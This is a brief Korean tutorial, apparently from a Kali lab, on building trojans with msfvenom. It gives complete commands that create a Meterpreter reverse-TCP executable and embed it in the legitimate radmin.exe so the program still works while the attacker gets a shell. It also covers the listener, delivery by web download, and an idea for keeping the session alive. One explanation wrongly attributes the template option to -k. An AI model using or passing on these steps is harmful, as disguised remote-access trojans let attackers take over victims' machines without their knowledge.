# 트로이 목마 제작-1
프로그램을 실행함과 동시에 리버스 커넥션을 통해 쉘을 탈취하는 트로이 목마를 제작해본다.
* msfvenom 사용
msfvenom 메타스플로잇의 부가기능으로 제공되는 프로그램이다. 각종 페이로드를 생성ㅎ할 수 있는 프로그램이다. 공격할때 사용되는 쉘코드, exe 실행파일 형태로 공격파일을 생성 할 수 있다.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=로컬 ip LPORT=4444 -f exe > bad.exe
exe 포맷으로 사용자가 클릭하면 바로 공격이 되는 bad.exe 라는 실행파일을 실행한다.
이 역시 핸들러가 필요하므로 multi/handler 모듈을 사용한다
payload 는 msfvenom 과 동일하게 설정하면 된다. 그 후, 별다른 옵션이 필요 없으므로 바로 실행하면 된다.
해당 파일을 kali/download 에 옮겨서 윈도우7애서 다운로드 하게 되면 리스터에서 응답을 하고 미터프리터 쉘이 실행된다.
# 트로이 목마 제작-2 정상적인 프로그램으로 보이는 real 트로이목마
/usr/share/windows-binaries 폴더에는 윈도우에서 사용할 수 있는 파일들이 있다.
radmin 을 파일로 위장한 파일 트로이목마를 제작하도록 한다.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=로컬 ip LPORT=4444 -f exe -x /usr/share/windows-binaries/radmin.exe -k > radmin.exe
-k 옵션은 위장 할 원본 파일을 지정, -k 는 페이로드가 새로운 스레드로 생성되게 하는 것이다 즉 페이로드와 상관없이 원본 프로그램이 정상적으로 작동되게 하는 것이다.
이렇게 생성된 파일이름을 기존 생성파일과 동일하게 두면 보다 더 그럴듯하게 된다.
그리고 multi/handler 를 실행하고, 웹서버에 다운로드 하고 실행한다.
radmin.exe 을 다운로드 하면 정상 파일처럼 실행이 되지만 공격자pc 에서는 meterpreter 쉘이 실행된다.
그러나 사용자가 radmin 프로그램을 닫아버리면 세션이 끊어진다. 별도의 프로그래밍을 통해 세션을 유지하는 기능을 넣어야 할것 같다.